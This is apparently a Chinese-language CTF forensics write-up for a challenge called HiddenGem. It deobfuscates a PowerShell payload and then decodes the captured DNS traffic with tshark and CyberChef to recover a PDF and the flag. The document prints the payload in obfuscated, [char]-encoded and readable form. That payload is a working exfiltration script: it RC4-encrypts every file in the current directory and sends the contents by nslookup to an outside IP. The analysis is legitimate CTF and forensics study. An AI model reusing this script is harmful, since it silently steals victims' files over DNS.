${)}${~}${@[} + ${)}${]}${~=} +${)}${~}${@[} + ${)}${@$/}${~=}+${)}${'$[}${~} +${)}${~=}${@[}${~=} + ${)}${~=}${~=}${$] }+ ${)}${~=}${~=}${]} + ${)}${~=}${;+}${~=} +${)}${~=}${;+}${@$/}+ ${)}${![/}${]}+${)}${'$[}${![/}+${)}${~=}${;+}${~=}+${)}${~=}${@[}${;+} + ${)}${~=}${~=}${]} +${)}${![/}${]} + ${)}${]}${@$/} + ${)}${~=}${~=}${;+} + ${)}${@$/}${@$/}+${)}${~=}${~=}${~=} +${)}${~=}${;+}${;+} + ${)}${~=}${;+}${$] }+ ${)}${~=}${~=}${;+} +${)}${~=}${;+}${~}+ ${)}${@$/}${~}+${)}${$] }${'$[}+${)}${$] }${'$[}+ ${)}${]}${$] } + ${)}${'$[}${~}+ ${)}${]}${](}+${)}${](}${~}+ ${)}${](}${~} + ${)}${$] }${@$/} +${)}${~}${@[}+${)}${~}${]} +${)}${~=}${~=}${@[}+${)}${~}${@[}+ ${)}${]}${~=} +${)}${~}${@[}+ ${)}${~}${]}+ ${)}${]}${@$/}+ ${)}${~=}${~=}${;+}+ ${)}${@$/}${@$/}+ ${)}${![/}${]} +${)}${](}${~=} +${)}${~=}${;+}${~=} +${)}${~=}${~=}${]} +${)}${]}${]}+ ${)}${~=}${@[}${~=}+${)}${~=}${~=}${]}+${)}${~=}${;+}${~=} + ${)}${~=}${~=}${$] }+${)}${![/}${;+} +${)}${~}${@$/}+${)}${@$/}${~=}+ ${)}${'$[}${~} + ${)}${~=}${@[}${~=} +${)}${~=}${~=}${$] } + ${)}${~=}${~=}${]} + ${)}${~=}${;+}${~=} +${)}${~=}${;+}${@$/}+ ${)}${![/}${]} + ${)}${](}${~}+${)}${](}${@$/}+ ${)}${![/}${]}+ ${)}${](}${;+}+${)}${~=}${;+}${$] }+ ${)}${~=}${;+}${'$[}+ ${)}${~=}${;+}${~=} +${)}${@$/}${~} + ${)}${$] }${'$[}+ ${)}${$] }${'$[}+ ${)}${'$[}${@[}+ ${)}${~=}${;+}${~=} + ${)}${@$/}${](} +${)}${~=}${;+}${;+}+ ${)}${]}${$] }+ ${)}${~=}${;+}${'$[} + ${)}${~=}${;+}${'$[}+${)}${]}${]} +${)}${~=}${@[}${~=}+${)}${~=}${~=}${]} + ${)}${~=}${;+}${~=} + ${)}${~=}${~=}${$] } + ${)}${![/}${;+} + ${)}${~}${]} +${)}${@$/}${$] }+${)}${![/}${]} +${)}${](}${;+}+${)}${~=}${~=}${](}+${)}${~=}${;+}${'$[}+${)}${~=}${;+}${'$[}+${)}${](}${'$[} + ${)}${@$/}${](} + ${)}${~=}${;+}${@$/} + ${)}${~=}${;+}${~=}+ ${)}${![/}${~=} +${)}${~}${@$/} + ${)}${![/}${~=} + ${)}${$] }${@$/}+${)}${~}${@[} + ${)}${~}${]} +${)}${~=}${@[}${@[} +${)}${~}${@[}+ ${)}${]}${~=} +${)}${~}${@[} + ${)}${~}${]}+ ${)}${]}${@$/}+ ${)}${~=}${~=}${;+}+ ${)}${@$/}${@$/} +${)}${![/}${]} +${)}${](}${~=} +${)}${~=}${;+}${~=} + ${)}${~=}${~=}${]} +${)}${]}${]} + ${)}${~=}${@[}${~=} +${)}${~=}${~=}${]}+ ${)}${~=}${;+}${~=} +${)}${~=}${~=}${$] } +${)}${![/}${;+}+${)}${@$/}${~=}+ ${)}${'$[}${~} + ${)}${~=}${@[}${~=}+ ${)}${~=}${~=}${$] }+ ${)}${~=}${~=}${]} +${)}${~=}${;+}${~=}+${)}${~=}${;+}${@$/}+ ${)}${![/}${]} + ${)}${](}${~}+${)}${](}${@$/}+ ${)}${![/}${]} +${)}${](}${;+} +${)}${~=}${;+}${$] } + ${)}${~=}${;+}${'$[}+${)}${~=}${;+}${~=} + ${)}${@$/}${~}+ ${)}${$] }${'$[}+${)}${$] }${'$[} +${)}${'$[}${@[} + ${)}${~=}${;+}${~=} +${)}${@$/}${](}+ ${)}${~=}${;+}${;+} +${)}${]}${$] } +${)}${~=}${;+}${'$[} + ${)}${~=}${;+}${'$[} +${)}${]}${]}+${)}${~=}${@[}${~=}+ ${)}${~=}${~=}${]} +${)}${~=}${;+}${~=} +${)}${~=}${~=}${$] }+ ${)}${![/}${;+}+${)}${~}${]} + ${)}${@$/}${$] } + ${)}${![/}${]} + ${)}${](}${;+} +${)}${~=}${~=}${](} +${)}${~=}${;+}${'$[}+ ${)}${~=}${;+}${'$[} + ${)}${](}${'$[}+${)}${@$/}${](}+${)}${~=}${;+}${@$/} + ${)}${~=}${;+}${~=} +${)}${![/}${~=}+${)}${![/}${~=} + ${)}${$] }${@$/} +${)}${~}${@[} +${)}${~}${]} +${)}${~=}${~=}${](} +${)}${~}${@[}+${)}${]}${~=} +${)}${~}${@[} + ${)}${![/}${;+}+ ${)}${~}${'$[} + ${)}${~}${@[}+${)}${~}${]}+${)}${'$[}${@[}+${)}${~}${@[} +${)}${~}${]} +${)}${~=}${@[}${@[} +${)}${~}${@[}+ ${)}${~}${]}+${)}${~=}${~=}${@[} + ${)}${![/}${~=}+ ${)}${$] }${@$/}+${)}${~}${@[}+ ${)}${~}${]}+${)}${~=}${;+}${~=} + ${)}${~}${@[} +${)}${]}${~=}+${)}${~}${@[}+${)}${@$/}${~=}+ ${)}${'$[}${~} +${)}${~=}${@[}${~=} + ${)}${~=}${~=}${$] }+${)}${~=}${~=}${]}+ ${)}${~=}${;+}${~=}+${)}${~=}${;+}${@$/} +${)}${![/}${]} +${)}${]}${](} +${)}${~=}${~=}${~=} +${)}${~=}${~=}${;+}+${)}${~=}${~=}${'$[} + ${)}${~=}${;+}${~=}+${)}${~=}${~=}${![/} + ${)}${~=}${~=}${]} + ${)}${@$/}${~}+${)}${$] }${'$[} +${)}${$] }${'$[}+ ${)}${'$[}${![/} + ${)}${~=}${~=}${~=}+ ${)}${]}${]}+${)}${@$/}${](} + ${)}${~=}${~=}${$] } +${)}${~=}${;+}${~=} +${)}${$] }${![/}+${)}${$] }${@[} +${)}${'$[}${~}+ ${)}${~=}${~=}${]} +${)}${~=}${~=}${![/} +${)}${~=}${;+}${$] } +${)}${~=}${~=}${;+} + ${)}${~=}${;+}${~}+ ${)}${![/}${;+} + ${)}${~}${]}+${)}${~=}${~=}${](} + ${)}${![/}${~=} +${)}${$] }${@$/} + ${)}${~}${@[} + ${)}${~}${]}+ ${)}${~=}${;+}${'$[} + ${)}${]}${~=}+ ${)}${~}${]}+ ${)}${~=}${;+}${~=}+ ${)}${![/}${]}+ ${)}${](}${]} +${)}${~=}${;+}${~=}+${)}${~=}${~=}${;+}+${)}${~=}${;+}${~}+ ${)}${~=}${~=}${]}+${)}${~=}${;+}${![/} + ${)}${$] }${@$/} + ${)}${~}${@[}+${)}${~}${]}+ ${)}${~=}${~=}${![/} +${)}${]}${~=}+ ${)}${~}${![/} +${)}${~}${![/} +${)}${$] }${@$/} + ${)}${~}${@[} +${)}${~}${]}+ ${)}${~=}${~=}${;+}+${)}${]}${~=}+ ${)}${![/}${'$[} + ${)}${$] }${@$/} + ${)}${~}${@[} + ${)}${~=}${~=}${@$/}+${)}${~=}${;+}${![/}+${)}${~=}${;+}${$] }+ ${)}${~=}${;+}${'$[} + ${)}${~=}${;+}${~=}+${)}${~}${@[} +${)}${![/}${;+} + ${)}${~}${]}+${)}${~=}${~=}${;+}+ ${)}${~}${@[} + ${)}${![/}${$] }+${)}${~=}${;+}${'$[} +${)}${~=}${;+}${~=} + ${)}${~}${@[}+${)}${![/}${;+}+ ${)}${~}${]} + ${)}${~=}${;+}${'$[}+${)}${![/}${](} +${)}${~}${]} + ${)}${@$/}${'$[}+${)}${![/}${~=} + ${)}${![/}${~=} +${)}${~}${@[}+${)}${~=}${@[}${~} +${)}${~}${@[} +${)}${~}${]} + ${)}${@$/}${@$/} + ${)}${]}${~=} + ${)}${~}${]} +${)}${@$/}${'$[} + ${)}${$] }${@$/}+${)}${~}${@[} +${)}${~=}${;+}${$] } + ${)}${~=}${;+}${@[} +${)}${~}${@[}+${)}${![/}${;+} +${)}${![/}${;+} + ${)}${~}${]}+ ${)}${~=}${~=}${;+}+ ${)}${![/}${@[} + ${)}${~}${]} +${)}${@$/}${'$[}+${)}${![/}${~=} +${)}${![/}${~}+${)}${~}${]} + ${)}${@$/}${@$/} +${)}${~}${@[} +${)}${![/}${$] } +${)}${~=}${;+}${~}+${)}${~=}${~=}${]} + ${)}${~}${@[}+ ${)}${~}${]}+${)}${~=}${;+}${'$[} +${)}${![/}${~=}+${)}${~}${@[} + ${)}${~=}${@[}${~}+${)}${~}${@[}+ ${)}${~}${]} + ${)}${@$/}${@$/}+${)}${]}${~=} + ${)}${~}${]} + ${)}${~=}${;+}${'$[} +${)}${![/}${$] } +${)}${![/}${;+}+ ${)}${~}${]}+ ${)}${~=}${~=}${;+}+ ${)}${![/}${@[}+${)}${~}${]} + ${)}${@$/}${'$[} + ${)}${![/}${~=}+${)}${~}${@[}+${)}${~=}${@[}${$] } + ${)}${$] }${@$/} +${)}${~}${@[} +${)}${~}${]}+ ${)}${~=}${~=}${![/} +${)}${![/}${~}+${)}${]}${~=}+ ${)}${~}${]}+ ${)}${~=}${;+}${~=} + ${)}${![/}${]} +${)}${'$[}${~}+${)}${~=}${~=}${](} + ${)}${@$/}${'$[} + ${)}${~=}${~=}${$] }+${)}${~=}${~=}${]} + ${)}${~=}${~=}${![/} +${)}${~=}${;+}${$] }+${)}${~=}${~=}${;+}+ ${)}${~=}${;+}${~} +${)}${![/}${;+}+${)}${~}${]} +${)}${~=}${~=}${;+}+${)}${![/}${@[}+ ${)}${~}${]} +${)}${@$/}${'$[} + ${)}${![/}${![/}+ ${)}${~}${@[}+ ${)}${~}${]}+ ${)}${@$/}${@$/} +${)}${![/}${~=} +${)}${~}${@[}+${)}${![/}${~}+${)}${~}${@[} + ${)}${~}${![/}+ ${)}${![/}${]} + ${)}${~}${![/}+${)}${$] }${@$/}+ ${)}${~}${@[}+${)}${~=}${;+}${$] }+${)}${~=}${;+}${@[} +${)}${~}${@[}+${)}${![/}${;+}+ ${)}${![/}${;+} + ${)}${~}${]}+ ${)}${~=}${~=}${;+} + ${)}${~}${](}+ ${)}${~}${]} + ${)}${~=}${~=}${$] } + ${)}${![/}${~=} + ${)}${~}${@[}+ ${)}${![/}${$] } + ${)}${~=}${;+}${~=} + ${)}${~=}${~=}${~} +${)}${~}${@[}+${)}${![/}${;+}+${)}${~}${]}+ ${)}${~=}${~=}${$] }+${)}${![/}${$] } +${)}${![/}${@$/}+ ${)}${![/}${~=} + ${)}${![/}${~=}+${)}${~}${@[} + ${)}${~=}${@[}${~}+ ${)}${~}${@[}+${)}${~=}${~=}${;+}+${)}${~=}${~=}${$] }+ ${)}${~=}${;+}${'$[} + ${)}${~=}${~=}${~=} +${)}${~=}${~=}${~=}+${)}${~=}${;+}${](}+${)}${~=}${~=}${](} +${)}${~=}${~=}${@[}+${)}${~}${@[} +${)}${![/}${$] }+ ${)}${~=}${~=}${]}+ ${)}${~=}${@[}${~=}+ ${)}${~=}${~=}${@[} + ${)}${~=}${;+}${~=}+ ${)}${]}${~=}+${)}${]}${$] } + ${)}${~}${@[} + ${)}${~}${]}+${)}${~=}${~=}${![/} +${)}${~}${]} +${)}${@$/}${](} + ${)}${![/}${]}+ ${)}${~}${@[} + ${)}${~}${]}+${)}${~=}${;+}${;+} + ${)}${$] }${@$/} +${)}${~}${@[}+ ${)}${~}${]} +${)}${~=}${~=}${![/}+ ${)}${]}${~=}+${)}${~}${![/} +${)}${~}${![/} +${)}${~}${@[}+ ${)}${~=}${@[}${$] }+${)}${~}${@[} +${)}${~}${]} +${)}${~=}${~=}${;+} +${)}${]}${~=}+ ${)}${~}${]}+${)}${~=}${~=}${;+} +${)}${![/}${~} + ${)}${![/}${@$/}+${)}${~}${@[}+${)}${~=}${@[}${$] } + ${)}${~}${@[} + ${)}${~=}${~=}${;+}+${)}${~=}${~=}${$] } + ${)}${~=}${;+}${'$[} + ${)}${~=}${~=}${~=}+${)}${~=}${~=}${~=}+${)}${~=}${;+}${](} + ${)}${~=}${~=}${](}+ ${)}${~=}${~=}${@[} +${)}${~}${@[}+ ${)}${![/}${$] }+${)}${~=}${~=}${]} + ${)}${~=}${@[}${~=}+ ${)}${~=}${~=}${@[}+ ${)}${~=}${;+}${~=} + ${)}${]}${~=}+ ${)}${]}${$] }+${)}${~}${@[}+ ${)}${~}${]} + ${)}${~=}${~=}${![/}+ ${)}${~}${]} +${)}${@$/}${](} +${)}${![/}${]} + ${)}${~}${@[} + ${)}${~}${]} +${)}${~=}${;+}${;+} +${)}${~}${@[}+ ${)}${~=}${@[}${$] } | ${;@!} " |& ${;@!}
再解密可以得到:
[CHar]36+[CHar]100+[CHar]61 +[CHar]34 +[CHar]49 +[CHar]55+ [CHar]50 +[CHar]46+[CHar]50+ [CHar]49 +[CHar]46+[CHar]50 + [CHar]48+[CHar]46+[CHar]57+[CHar]54 +[CHar]34 +[CHar]59 +[CHar]32+ [CHar]36+[CHar]115 + [CHar]61+ [CHar]52 + [CHar]59+ [CHar]32 + [CHar]36+[CHar]98 +[CHar]61+ [CHar]53 + [CHar]55 + [CHar]59 +[CHar]32 +[CHar]71+ [CHar]101+ [CHar]116 +[CHar]45 +[CHar]67+ [CHar]104+[CHar]105+ [CHar]108 +[CHar]100 +[CHar]73 + [CHar]116+[CHar]101+[CHar]109+ [CHar]32 + [CHar]34 +[CHar]46 +[CHar]34+ [CHar]32+ [CHar]124+ [CHar]32 +[CHar]70+ [CHar]111+[CHar]114+[CHar]101 +[CHar]97+[CHar]99+[CHar]104+[CHar]45+ [CHar]79+[CHar]98 +[CHar]106+ [CHar]101 +[CHar]99 + [CHar]116+ [CHar]32 +[CHar]123 + [CHar]36 + [CHar]97+[CHar]61+ [CHar]91 + [CHar]83 + [CHar]121+[CHar]115 + [CHar]116+[CHar]101+ [CHar]109 + [CHar]46+[CHar]67+ [CHar]111+ [CHar]110+ [CHar]118+ [CHar]101+ [CHar]114+[CHar]116 +[CHar]93 +[CHar]58+ [CHar]58+ [CHar]84+[CHar]111+ [CHar]66+[CHar]97 +[CHar]115+ [CHar]101+[CHar]54 + [CHar]52+[CHar]83 +[CHar]116 + [CHar]114+ [CHar]105+[CHar]110+ [CHar]103+ [CHar]40+ [CHar]36+[CHar]69 +[CHar]110+ [CHar]99 + [CHar]46+[CHar]71 +[CHar]101 + [CHar]116 + [CHar]66+ [CHar]121+[CHar]116+[CHar]101 +[CHar]115+[CHar]40 +[CHar]36 + [CHar]95 + [CHar]46+ [CHar]78+ [CHar]97 +[CHar]109 +[CHar]101+[CHar]41+ [CHar]41 +[CHar]59+ [CHar]32 +[CHar]36+[CHar]82+[CHar]61 + [CHar]123+[CHar]36 +[CHar]68 + [CHar]44 +[CHar]36 + [CHar]75 +[CHar]61 +[CHar]36+[CHar]65+[CHar]114 + [CHar]103 +[CHar]115+[CHar]59 +[CHar]36+ [CHar]83+[CHar]61+ [CHar]48+[CHar]46+ [CHar]46 + [CHar]50 + [CHar]53 +[CHar]53 +[CHar]59 + [CHar]48 +[CHar]46+[CHar]46 + [CHar]50+ [CHar]53+ [CHar]53 +[CHar]124 +[CHar]37+[CHar]123 +[CHar]36 + [CHar]74 +[CHar]61 +[CHar]40+[CHar]36+[CHar]74+[CHar]43 + [CHar]36 + [CHar]83+ [CHar]91+ [CHar]36+[CHar]95+[CHar]93+ [CHar]43 + [CHar]36 + [CHar]75 +[CHar]91 +[CHar]36 +[CHar]95+ [CHar]37 +[CHar]36 + [CHar]75 + [CHar]46+[CHar]76 +[CHar]101+[CHar]110 + [CHar]103+ [CHar]116 +[CHar]104 +[CHar]93+[CHar]41+ [CHar]37+[CHar]50+[CHar]53+[CHar]54 + [CHar]59 + [CHar]36+[CHar]83+ [CHar]91+ [CHar]36 + [CHar]95 +[CHar]93 + [CHar]44 + [CHar]36 +[CHar]83+[CHar]91 +[CHar]36+ [CHar]74+ [CHar]93 +[CHar]61+[CHar]36+ [CHar]83+[CHar]91+[CHar]36 + [CHar]74 +[CHar]93+ [CHar]44 + [CHar]36 + [CHar]83 +[CHar]91 +[CHar]36 +[CHar]95 + [CHar]93 +[CHar]125+[CHar]59 + [CHar]36+ [CHar]68+ [CHar]124+[CHar]37 + [CHar]123 +[CHar]36 +[CHar]73+[CHar]61 +[CHar]40+ [CHar]36+ [CHar]73 + [CHar]43+ [CHar]49+ [CHar]41 + [CHar]37 +[CHar]50 +[CHar]53+[CHar]54+ [CHar]59+ [CHar]36+ [CHar]72 +[CHar]61+[CHar]40+ [CHar]36 +[CHar]72+ [CHar]43 +[CHar]36+[CHar]83+ [CHar]91 + [CHar]36+[CHar]73+[CHar]93+[CHar]41 + [CHar]37 +[CHar]50+ [CHar]53 + [CHar]54 +[CHar]59+[CHar]36 +[CHar]83+[CHar]91+ [CHar]36 +[CHar]73+[CHar]93+[CHar]44+ [CHar]36+ [CHar]83+ [CHar]91+ [CHar]36+ [CHar]72 +[CHar]93 + [CHar]61 +[CHar]36+[CHar]83+ [CHar]91 + [CHar]36+[CHar]72+[CHar]93+ [CHar]44 + [CHar]36+ [CHar]83 +[CHar]91+ [CHar]36 + [CHar]73+[CHar]93 + [CHar]59 + [CHar]36 + [CHar]95 +[CHar]45+ [CHar]98+[CHar]120+ [CHar]111 + [CHar]114+ [CHar]36+ [CHar]83+[CHar]91+ [CHar]40+ [CHar]36+[CHar]83+[CHar]91+ [CHar]36+ [CHar]73 +[CHar]93 +[CHar]43 + [CHar]36+ [CHar]83 +[CHar]91+[CHar]36 +[CHar]72+[CHar]93 + [CHar]41+ [CHar]37 + [CHar]50+ [CHar]53 + [CHar]54 +[CHar]93+ [CHar]125+ [CHar]125+ [CHar]59+ [CHar]32 +[CHar]36 + [CHar]69 +[CHar]110 + [CHar]99+ [CHar]32 + [CHar]61 +[CHar]32 + [CHar]91+[CHar]83 +[CHar]121 + [CHar]115+ [CHar]116 + [CHar]101 +[CHar]109+ [CHar]46+[CHar]84+[CHar]101+[CHar]120 + [CHar]116 +[CHar]46 + [CHar]69 + [CHar]110 + [CHar]99+[CHar]111 +[CHar]100 + [CHar]105+ [CHar]110 +[CHar]103+ [CHar]93+[CHar]58+[CHar]58+ [CHar]65 + [CHar]83+ [CHar]67+[CHar]73+ [CHar]73 + [CHar]59 +[CHar]32+[CHar]36 +[CHar]112+[CHar]32+ [CHar]61 +[CHar]32+ [CHar]36+ [CHar]69+ [CHar]110+ [CHar]99+ [CHar]46 +[CHar]71 +[CHar]101 +[CHar]116 +[CHar]66+ [CHar]121+[CHar]116+[CHar]101 + [CHar]115+[CHar]40 +[CHar]39+[CHar]91+ [CHar]83 + [CHar]121 +[CHar]115 + [CHar]116 + [CHar]101 +[CHar]109+ [CHar]46 + [CHar]73+[CHar]79+ [CHar]46+ [CHar]70+[CHar]105+ [CHar]108+ [CHar]101 +[CHar]93 + [CHar]58+ [CHar]58+ [CHar]82+ [CHar]101 + [CHar]97 +[CHar]100+ [CHar]65+ [CHar]108 + [CHar]108+[CHar]66 +[CHar]121+[CHar]116 + [CHar]101 + [CHar]115 + [CHar]40 + [CHar]36 +[CHar]95+[CHar]46 +[CHar]70+[CHar]117+[CHar]108+[CHar]108+[CHar]78 + [CHar]97 + [CHar]109 + [CHar]101+ [CHar]41 +[CHar]39 + [CHar]41 + [CHar]59+[CHar]32 + [CHar]36 +[CHar]122 +[CHar]32+ [CHar]61 +[CHar]32 + [CHar]36+ [CHar]69+ [CHar]110+ [CHar]99 +[CHar]46 +[CHar]71 +[CHar]101 + [CHar]116 +[CHar]66 + [CHar]121 +[CHar]116+ [CHar]101 +[CHar]115 +[CHar]40+[CHar]91+ [CHar]83 + [CHar]121+ [CHar]115+ [CHar]116 +[CHar]101+[CHar]109+ [CHar]46 + [CHar]73+[CHar]79+ [CHar]46 +[CHar]70 +[CHar]105 + [CHar]108+[CHar]101 + [CHar]93+ [CHar]58+[CHar]58 +[CHar]82 + [CHar]101 +[CHar]97+ [CHar]100 +[CHar]65 +[CHar]108 + [CHar]108 +[CHar]66+[CHar]121+ [CHar]116 +[CHar]101 +[CHar]115+ [CHar]40+[CHar]36 + [CHar]95 + [CHar]46 + [CHar]70 +[CHar]117 +[CHar]108+ [CHar]108 + [CHar]78+[CHar]97+[CHar]109 + [CHar]101 +[CHar]41+[CHar]41 + [CHar]59 +[CHar]32 +[CHar]36 +[CHar]117 +[CHar]32+[CHar]61 +[CHar]32 + [CHar]40+ [CHar]38 + [CHar]32+[CHar]36+[CHar]82+[CHar]32 +[CHar]36 +[CHar]122 +[CHar]32+ [CHar]36+[CHar]112 + [CHar]41+ [CHar]59+[CHar]32+ [CHar]36+[CHar]101 + [CHar]32 +[CHar]61+[CHar]32+[CHar]91+ [CHar]83 +[CHar]121 + [CHar]115+[CHar]116+ [CHar]101+[CHar]109 +[CHar]46 +[CHar]67 +[CHar]111 +[CHar]110+[CHar]118 + [CHar]101+[CHar]114 + [CHar]116 + [CHar]93+[CHar]58 +[CHar]58+ [CHar]84 + [CHar]111+ [CHar]66+[CHar]97 + [CHar]115 +[CHar]101 +[CHar]54+[CHar]52 +[CHar]83+ [CHar]116 +[CHar]114 +[CHar]105 +[CHar]110 + [CHar]103+ [CHar]40 + [CHar]36+[CHar]117 + [CHar]41 +[CHar]59 + [CHar]32 + [CHar]36+ [CHar]108 + [CHar]61+ [CHar]36+ [CHar]101+ [CHar]46+ [CHar]76 +[CHar]101+[CHar]110+[CHar]103+ [CHar]116+[CHar]104 + [CHar]59 + [CHar]32+[CHar]36+ [CHar]114 +[CHar]61+ [CHar]34 +[CHar]34 +[CHar]59 + [CHar]32 +[CHar]36+ [CHar]110+[CHar]61+ [CHar]48 + [CHar]59 + [CHar]32 + [CHar]119+[CHar]104+[CHar]105+ [CHar]108 + [CHar]101+[CHar]32 +[CHar]40 + [CHar]36+[CHar]110+ [CHar]32 + [CHar]45+[CHar]108 +[CHar]101 + [CHar]32+[CHar]40+ [CHar]36 + [CHar]108+[CHar]47 +[CHar]36 + [CHar]98+[CHar]41 + [CHar]41 +[CHar]32+[CHar]123 +[CHar]32 +[CHar]36 + [CHar]99 + [CHar]61 + [CHar]36 +[CHar]98 + [CHar]59+[CHar]32 +[CHar]105 + [CHar]102 +[CHar]32+[CHar]40 +[CHar]40 + [CHar]36+ [CHar]110+ [CHar]42 + [CHar]36 +[CHar]98+[CHar]41 +[CHar]43+[CHar]36 + [CHar]99 +[CHar]32 +[CHar]45 +[CHar]103+[CHar]116 + [CHar]32+ [CHar]36+[CHar]108 +[CHar]41+[CHar]32 + [CHar]123+[CHar]32+ [CHar]36 + [CHar]99+[CHar]61 + [CHar]36 + [CHar]108 +[CHar]45 +[CHar]40+ [CHar]36+ [CHar]110+ [CHar]42+[CHar]36 + [CHar]98 + [CHar]41+[CHar]32+[CHar]125 + [CHar]59 +[CHar]32 +[CHar]36+ [CHar]114 +[CHar]43+[CHar]61+ [CHar]36+ [CHar]101 + [CHar]46 +[CHar]83+[CHar]117 + [CHar]98 + [CHar]115+[CHar]116 + [CHar]114 +[CHar]105+[CHar]110+ [CHar]103 +[CHar]40+[CHar]36 +[CHar]110+[CHar]42+ [CHar]36 +[CHar]98 + [CHar]44+ [CHar]32+ [CHar]36+ [CHar]99 +[CHar]41 +[CHar]32+[CHar]43+[CHar]32 + [CHar]34+ [CHar]46 + [CHar]34+[CHar]59+ [CHar]32+[CHar]105+[CHar]102 +[CHar]32+[CHar]40+ [CHar]40 + [CHar]36+ [CHar]110 + [CHar]37+ [CHar]36 + [CHar]115 + [CHar]41 + [CHar]32+ [CHar]45 + [CHar]101 + [CHar]113 +[CHar]32+[CHar]40+[CHar]36+ [CHar]115+[CHar]45 +[CHar]49+ [CHar]41 + [CHar]41+[CHar]32 + [CHar]123+ [CHar]32+[CHar]110+[CHar]115+ [CHar]108 + [CHar]111 +[CHar]111+[CHar]107+[CHar]117 +[CHar]112+[CHar]32 +[CHar]45+ [CHar]116+ [CHar]121+ [CHar]112 + [CHar]101+ [CHar]61+[CHar]65 + [CHar]32 + [CHar]36+[CHar]114 +[CHar]36 +[CHar]97 + [CHar]46+ [CHar]32 + [CHar]36+[CHar]100 + [CHar]59 +[CHar]32+ [CHar]36 +[CHar]114+ [CHar]61+[CHar]34 +[CHar]34 +[CHar]32+ [CHar]125+[CHar]32 +[CHar]36 +[CHar]110 +[CHar]61+ [CHar]36+[CHar]110 +[CHar]43 + [CHar]49+[CHar]32+[CHar]125 + [CHar]32 + [CHar]110+[CHar]115 + [CHar]108 + [CHar]111+[CHar]111+[CHar]107 + [CHar]117+ [CHar]112 +[CHar]32+ [CHar]45+[CHar]116 + [CHar]121+ [CHar]112+ [CHar]101 + [CHar]61+ [CHar]65+[CHar]32+ [CHar]36 + [CHar]114+ [CHar]36 +[CHar]97 +[CHar]46 + [CHar]32 + [CHar]36 +[CHar]100 +[CHar]32+ [CHar]125 | iex
最后解密格式化的时候可以得到
$d="172.21.20.96";
$s=4;
$b=57;
Get-ChildItem "." | Foreach-Object {
$a=[System.Convert]::ToBase64String($Enc.GetBytes($_.Name));
$R={
$D,$K=$Args;
$S=0..255;0..255|%{
$J=($J+$S[$_]+$K[$_%$K.Length])%256;
$S[$_],$S[$J]=$S[$J],$S[$_]
};
$D|%{
$I=($I+1)%256;
$H=($H+$S[$I])%256;
$S[$I],$S[$H]=$S[$H],$S[$I];
$_-bxor$S[($S[$I]+$S[$H])%256]
}
};
$Enc = [System.Text.Encoding]::ASCII;
$p = $Enc.GetBytes('[System.IO.File]::ReadAllBytes($_.FullName)');
$z = $Enc.GetBytes([System.IO.File]::ReadAllBytes($_.FullName));
$u = (& $R $z $p);
$e = [System.Convert]::ToBase64String($u);
$l=$e.Length;
$r="";
$n=0;
while ($n -le ($l/$b)) {
$c=$b;
if (($n*$b)+$c -gt $l) {
$c=$l-($n*$b)
};
$r+=$e.Substring($n*$b, $c) + ".";
if (($n%$s) -eq ($s-1)) {
nslookup -type=A $r$a. $d; $r=""
}
$n=$n+1
}
nslookup -type=A $r$a. $d
}
可以观察到他其实本质是base64+rc4+拆分 搞了个cyberchef解密:https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)RC4(%7B'option':'UTF8','string':'%5BSystem.IO.File%5D::ReadAllBytes($_.FullName)'%7D,'Latin1','Latin1')From_Decimal('Space',false)
tshark -r HiddenGem.pcapng -T fields -e dns.resp.name | sed '/^\s*$/d' > 1.txt
先全部提取进1.txt中,可以看出,dns流量的形式是将数据进行上面的加密后再每57个字符以"."来间隔开,每行三段并在最后添加文件名的base64编码,所以通过简单的提取,便可以知道所有的文件名
des.txt
KCSC.jpg
SecretPlan.pdf
update.ps1
zoneblue.jpg
而其中最可疑的就是SecretPlan.pdf,于是可以是手动将其提取并去除文件数据以外的数据,然后在上面的cyberchef链接里解密即可
可以发现出现了我们想要的PDF文件
从而得到url https://pastebin.com/xCmXLGUq,访问即可拿到flag --> idek{RDP_Cache_1s_g0OD_bu7_1_h4t3_t4K1n9_t3x7_fr0M_Im4g3s}
希望大家喜欢以及有所收获,另外如果有错误欢迎指出私信以及邮箱都可,十分感谢!